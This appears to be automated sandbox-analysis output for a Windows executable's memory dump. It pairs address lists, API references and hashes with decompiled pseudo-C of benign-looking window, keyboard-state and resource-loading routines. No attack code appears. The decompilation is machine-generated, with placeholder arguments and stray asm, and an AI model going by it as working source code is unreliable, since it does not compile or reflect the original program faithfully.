0x0044eee8
0x00000000
0x0044eeb9
0x0044eeb9
0x0044efab
0x0044efb9
0x0044efc0
0x0044efc3
0x0044efc9
0x0044efd3
0x0044efd5
0x0044efd7
0x0044efda
0x0044efe1
0x0044efe3
0x0044efe6
0x0044efe6
0x0044efe6
0x0044efe6
0x0044efe1
0x0044eff3
0x0044eff3
0x0044eff5
0x0044efff
0x0044f008
0x0044f008
0x0044f00a
0x0044f014
0x0044f017
0x0044f00c
0x0044f00c
0x0044f00e
0x00000000
0x00000000
0x0044f00e
0x0044eff7
0x0044eff7
0x0044eff9
0x00000000
0x00000000
0x0044eff9
0x0044eff5
0x00000000
0x0044eebf
0x0044eec2
0x0044eec5
0x0044eeef
0x0044eef6
0x0044eefc
0x0044eeff
0x00000000
0x0044ef05
0x0044ef05
0x0044ef08
0x0044ef0c
0x00000000
0x0044ef12
0x0044ef12
0x0044ef14
0x0044ef17
0x0044ef1e
0x0044ef40
0x0044ef46
0x0044ef48
0x0044ef4a
0x0044ef4d
0x0044ef54
0x0044ef54
0x0044ef4d
0x0044ef20
0x0044ef23
0x0044ef28
0x0044ef2a
0x0044ef39
0x0044ef39
0x0044ef2a
0x0044ef56
0x0044ef58
0x00000000
0x0044ef5e
0x0044ef5f
0x0044ef5f
0x0044ef58
0x0044ef0c
0x0044eeff
0x00000000
0x0044eec7
0x0044eec7
0x0044eeca
0x0044f023
0x0044f029
0x0044f02c
0x00000000
0x0044f032
0x0044f032
0x0044f035
0x0044f03c
0x00000000
0x0044f042
0x0044f058
0x0044f05a
0x0044f05c
0x00000000
0x0044f062
0x0044f06e
0x0044f073
0x0044f074
0x0044f079
0x0044f07c
0x0044f08b
0x0044f090
0x0044f091
0x0044f096
0x0044f099
0x0044f0a5
0x0044f0b8
0x0044f0d0
0x0044f0d7
0x0044f0da
0x0044f0dd
0x0044f0e2
0x0044f0e7
0x0044f0fc
0x0044f0fc
0x0044f05c
0x0044f03c
0x0044eed0
0x0044eed1
0x0044f121
0x0044f124
0x0044f127
0x00000000
0x0044f12d
0x0044f12d
0x0044f130
0x0044f137
0x00000000
0x0044f13d
0x0044f150
0x0044f152
0x0044f154
0x00000000
0x0044f15a
0x0044f15d
0x0044f163
0x0044f168
0x0044f176
0x0044f185
0x0044f193
0x0044f19f
0x0044f1ad
0x0044f1b6
0x0044f1c9
0x0044f1dc
0x0044f1e1
0x0044f1e4
0x0044f1e7
0x0044f1ec
0x0044f1f1
0x0044f203
0x0044f203
0x0044f154
0x0044f137
0x0044eed7
0x0044f24f
0x0044f251
0x0044f257
0x0044f265
0x0044f276
0x0044f287
0x0044f298
0x0044f2a9
0x0044f2ba
0x0044f2ba
0x0044f2bf
0x0044f2c4
0x0044f2c9
0x0044f2cf
0x0044f2cf
0x0044eed1
0x0044eeca
0x0044eec5
0x0044eeb9

APIs

SetFocus.USER32(00000000), ref: 0044EF5F
SaveDC.GDI32(?), ref: 0044F086
RestoreDC.GDI32(?,?), ref: 0044F0F7
72E7B080.USER32(00000000), ref: 0044F163
SaveDC.GDI32(?), ref: 0044F19A
RestoreDC.GDI32(?,?), ref: 0044F1FE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$B080Focus
String ID:
API String ID: 809140284-0
Opcode ID: 2f2cb70563da92b464fba4b795336a6927570e5e506edbfeab6571d9bbef98a6
Instruction ID: 422c6132e545bf21ba43120169389d5e6a566aa04ef9362ddfa3128736266a36
Opcode Fuzzy Hash: 2f2cb70563da92b464fba4b795336a6927570e5e506edbfeab6571d9bbef98a6
Instruction Fuzzy Hash: 7AB19035A00104EFEB10DFA9C585AAEB3F5FB18300F6540B6E804A7352CB79EE45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00454FFC, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00454FFC(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E00453FF4( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043C1F4( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406D8C();
						}
					}
					_t26 =  *0x490fe4; // 0x492a9c
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x490fe4; // 0x492a9c
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0044FDAC(_t36, 0);
						E00452184( *((intOrPtr*)(_t51 + 0x44)));
					}
					E00454670(_t51);
					_t21 =  *0x492c08; // 0x241094c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043C1F4(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}

0x00454ffe
0x00455004
0x0045500b
0x00455015
0x0045501e
0x00455058
0x00455060
0x0045502f
0x0045503d
0x0045503f
0x00000000
0x00455041
0x00455041
0x00455043
0x00455048
0x00455050
0x00455051
0x00455051
0x0045503f
0x0045506d
0x00455076
0x00455078
0x0045507a
0x0045507a
0x00455080
0x00455089
0x0045508b
0x0045508d
0x0045508d
0x00455097
0x0045509c
0x004550a1
0x004550b4
0x004550bc
0x004550bc
0x004550c3
0x004550c8
0x004550cd
0x004550d2
0x004550dc
0x004550dc
0x004550e9
0x00000000
0x004550f3
0x004550e9
0x004550fb

APIs

IsIconic.USER32 ref: 00455004
SetActiveWindow.USER32(?,?,?,?,00454A46,00000000,00454EE8), ref: 00455015
IsWindowEnabled.USER32(00000000), ref: 00455038
NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A46,00000000,00454EE8), ref: 00455051
SetWindowPos.USER32(?,00000000,00000000,?,?,00454A46,00000000,00454EE8), ref: 00455097
SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A46,00000000,00454EE8), ref: 004550DC

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicNtdllProc_
String ID:
API String ID: 3996302123-0
Opcode ID: 730f7c70c4e062e7b5e6c6a54ab183b9a426efba0a4dbcfcd3680863ffd867a6
Instruction ID: a3ebcee7396711d3e00125f8aaa75dd9aa02ea69c567b2c3d64d2d41e53cdeca
Opcode Fuzzy Hash: 730f7c70c4e062e7b5e6c6a54ab183b9a426efba0a4dbcfcd3680863ffd867a6
Instruction Fuzzy Hash: 2A312170B046409BEB14AB69CD95B6637A86F05705F0801ABBE00EF2D7DA7DEC888759

Uniqueness

Uniqueness Score: -1.00%

Function 0043BC20, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043BC20(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043C4F8(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043C4F8(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435514(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E004351C8(_t52);
						return E004037D8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}

0x0043bc29
0x0043bc2b
0x0043bc2d
0x0043bc32
0x0043bc4d
0x0043bc56
0x0043bc84
0x0043bc84
0x0043bc87
0x0043bc8d
0x0043bc93
0x0043bc98
0x0043bc9d
0x0043bc9f
0x0043bca1
0x0043bcb3
0x0043bcbd
0x0043bcc8
0x0043bcc9
0x0043bcca
0x0043bccb
0x0043bcd7
0x0043bcd7
0x0043bcdc
0x0043bcde
0x00000000
0x0043bce9
0x0043bc5f
0x0043bc64
0x0043bc66
0x00000000
0x00000000
0x0043bc7d
0x00000000
0x0043bc41
0x0043bc41
0x0043bc47
0x0043bcf4
0x0043bcf4
0x00000000
0x0043bc47

APIs

IsIconic.USER32 ref: 0043BC5F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043BC7D
GetWindowPlacement.USER32(?,0000002C), ref: 0043BCB3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043BCD7

Strings

,, xrefs: 0043BCA1

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 61bb0041f070bdc7d4d6a620951ce1077ea930391e219bd71c86ea1f686e33e1
Instruction ID: 1f861a72d3cf7d1a47b6ae4a07e5aa439d0d01450f76f4d5502414f5fab386b5
Opcode Fuzzy Hash: 61bb0041f070bdc7d4d6a620951ce1077ea930391e219bd71c86ea1f686e33e1
Instruction Fuzzy Hash: A6212171A00108ABCF54EE69C8C1A9A77A8EF4D314F04946AFE14EF346DB75ED048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00454F4C, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00454F4C(void* __eax) {
				struct HWND__* _t21;
				void* _t40;

				_t40 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 == 0) {
					E00454660();
					SetActiveWindow( *(_t40 + 0x30));
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043C1F4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t21 = E00453FF4( *(_t40 + 0x30), 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						SetWindowPos( *(_t40 + 0x30), E0043C1F4( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t21 =  *(_t40 + 0x30);
						_push(_t21);
						L00406D8C();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}

0x00454f4e
0x00454f54
0x00454f5b
0x00454f63
0x00454f6c
0x00454f75
0x00454fdc
0x00454f98
0x00454f9c
0x00454fb8
0x00454fbd
0x00454fbf
0x00454fc4
0x00454fc9
0x00454fcc
0x00454fcd
0x00454fcd
0x00454fe9
0x00000000
0x00454ff3
0x00454fe9
0x00454ffb

APIs

IsIconic.USER32 ref: 00454F54
SetActiveWindow.USER32(?,?,?,?,004555E4), ref: 00454F6C
IsWindowEnabled.USER32(00000000), ref: 00454F8F
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,004555E4), ref: 00454FB8
NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?), ref: 00454FCD

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledIconicNtdllProc_
String ID:
API String ID: 1720852555-0
Opcode ID: ad03ebd0f3e8e311cdf5e5300eccb440042bde9c7c6e0408e7eaf941df049234
Instruction ID: b7d07c3e81a0296378add28009795847762988f30e702c32772d708d515b7fa3
Opcode Fuzzy Hash: ad03ebd0f3e8e311cdf5e5300eccb440042bde9c7c6e0408e7eaf941df049234
Instruction Fuzzy Hash: 67111271604240ABDF54EE6DC9C6F5637ACAF48309F08106AFE04DF287D679EC849724

Uniqueness

Uniqueness Score: -1.00%

Function 00427394, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00427394(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x492ac5 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00427304( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x492aa0; // 0x427394
				 *0x492aa0 = E00427194(1, _t19, _t21, __edi, _t23);
				return  *0x492aa0(_t23, _t19);
			}

0x0042739c
0x0042739f
0x004273a9
0x004273d3
0x004273e4
0x004273f7
0x004273e6
0x004273eb
0x004273eb
0x00000000
0x00427401
0x00000000
0x004273d5
0x004273b0
0x004273bd
0x00000000

Strings

MonitorFromWindow, xrefs: 004273AB

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: a14943776bb286ad595f323769ec3cc7a69c20f54c36c4ddb03cce01831f9130
Instruction ID: 83b475725e4d9881bc0f68c93cdb8858a68a55a1d8f153db513f2c4250c396f2
Opcode Fuzzy Hash: a14943776bb286ad595f323769ec3cc7a69c20f54c36c4ddb03cce01831f9130
Instruction Fuzzy Hash: 7F01AD3260A038AAC711EB50AD81EBF775CEF05364B84403BFC06A7242D77C9906D3AE

Uniqueness

Uniqueness Score: -1.00%

Function 004586FC, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004586FC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x45895c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E004581C4(_v8,  &_v528);
					if(E0040A9D4(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E004584DC(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E004581C4(_v8,  &_v540);
					_t75 = E00404600(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E004581C4(_v8,  &_v544);
						_v12 = E00404600(_v544);
					}
					E004586D8(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E004581C4(_v8,  &_v532);
					if(_t135 < E00404600(_v532)) {
						E004581C4(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0x926855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E004586D8(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x458963);
						return E0040436C( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x476c74 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x4588ca);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x100,  *(0x476c74 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x101,  *(0x476c74 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x4588d1);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}

0x004586fd
0x004586ff
0x00458709
0x0045870f
0x00458715
0x0045871b
0x00458721
0x00458727
0x00458729
0x0045872e
0x0045872f
0x00458734
0x00458737
0x0045873d
0x00458748
0x0045875c
0x0045875e
0x0045875e
0x0045875c
0x0045875f
0x0045876c
0x004588eb
0x004588ef
0x004588f1
0x004588f3
0x004588f3
0x004588ff
0x0045890a
0x0045890f
0x00458912
0x0045891d
0x0045892d
0x0045892d
0x00458939
0x00000000
0x00458772
0x00458776
0x0045877a
0x0045877a
0x00458780
0x0045878a
0x0045879c
0x004587a7
0x004587c1
0x004587c4
0x004587c6
0x004587c6
0x004587c4
0x004587ca
0x004587ca
0x004587d3
0x004587d5
0x004587d8
0x004587d8
0x004587e2
0x004587ea
0x004588e3
0x0045893e
0x0045893e
0x00458940
0x00458943
0x00458946
0x0045895b
0x004587f0
0x004587f7
0x004587fc
0x00458801
0x00458807
0x00458807
0x0045880a
0x0045880b
0x0045880b
0x0045880b
0x0045880e
0x0045882c
0x0045883b
0x00458843
0x0045884c
0x0045884d
0x00458852
0x00458855
0x00458861
0x00458880
0x0045888e
0x004588ad
0x004588b4
0x004588b7
0x004588ba
0x004588bf
0x004588c2
0x004588c9
0x004588c9
0x004587ea

APIs

GetKeyboardState.USER32(?,00000000,0045895C), ref: 004587F7
SetKeyboardState.USER32(00000081), ref: 0045883B
SendMessageA.USER32 ref: 00458880
SendMessageA.USER32 ref: 004588AD

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageSendState
String ID:
API String ID: 1999190242-0
Opcode ID: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction ID: bb88850a2d90e2ea23539d4f08a87eb6d4946d203e876879aff1aee77e364116
Opcode Fuzzy Hash: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction Fuzzy Hash: 53615F74A04608AFCB10EF69C885ADDB7F4EB59304F6045EAE844B7392DF386E84DB15

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004171B0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00417140(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x416f50
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00417140(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x416f50
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416a70
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416F10(_t23, _t25, _t18);
			}

0x004171b7
0x004171ba
0x004171bc
0x004171cc
0x004171ce
0x004171d1
0x004171d3
0x004171d6
0x004171db
0x004171db
0x004171dc
0x004171e6
0x004171e8
0x004171eb
0x004171ed
0x004171f0
0x004171f5
0x004171f6
0x00417200
0x00417201
0x00417205
0x0041720e
0x00417219

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004171C7
LoadResource.KERNEL32(?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 004171E1
SizeofResource.KERNEL32(?,00416F50,?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 004171FB
LockResource.KERNEL32(00416A70,00000000,?,00416F50,?,00416F50,?,?,?,004123A8,?,00000001,00000000,?,00417120,?), ref: 00417205

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 29d46a75b5a091bc257bae7ff510dddbb095a7f172de68a6d7d2c5cdc354b81a
Instruction ID: 6686bbd2eae848e43a10de4bfebf77ca25a9ad9c699b14ab91c76057114fb30b
Opcode Fuzzy Hash: 29d46a75b5a091bc257bae7ff510dddbb095a7f172de68a6d7d2c5cdc354b81a
Instruction Fuzzy Hash: 79F04BB26052047F9704FE6AA881D9B77ECEE893A4311406AF909D7306DA39DD51876C

Uniqueness

Uniqueness Score: -1.00%

Function 0043061C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0043061C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x430699);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00430068(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0042FCC0(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047F8(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x4306a0);
				return E00404348( &_v8);
			}

0x0043061f
0x00430623
0x00430627
0x00430628
0x0043062d
0x00430630
0x00430635
0x0043063f
0x00430641
0x00430643
0x0043064f
0x0043065d
0x00430666
0x0043066f
0x0043067e
0x0043067e
0x00430685
0x00430688
0x0043068b
0x00430698

APIs

Part of subcall function 00430068: WinHelpA.USER32 ref: 00430077

GetTickCount.KERNEL32 ref: 0043063A
Sleep.KERNEL32(00000000,00000000,00430699,?,?,00000000,00000000,?,0043060F), ref: 00430643
GetTickCount.KERNEL32 ref: 00430648
WinHelpA.USER32 ref: 0043067E

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
Instruction ID: 75981a8233ee4d01c2f1e5df9000261321f57b032b19e9e9952387f5457eb5df
Opcode Fuzzy Hash: 307853dfaaaca8895fa90b21484c890783f8255f017dd7281ba543b6550d1dbe
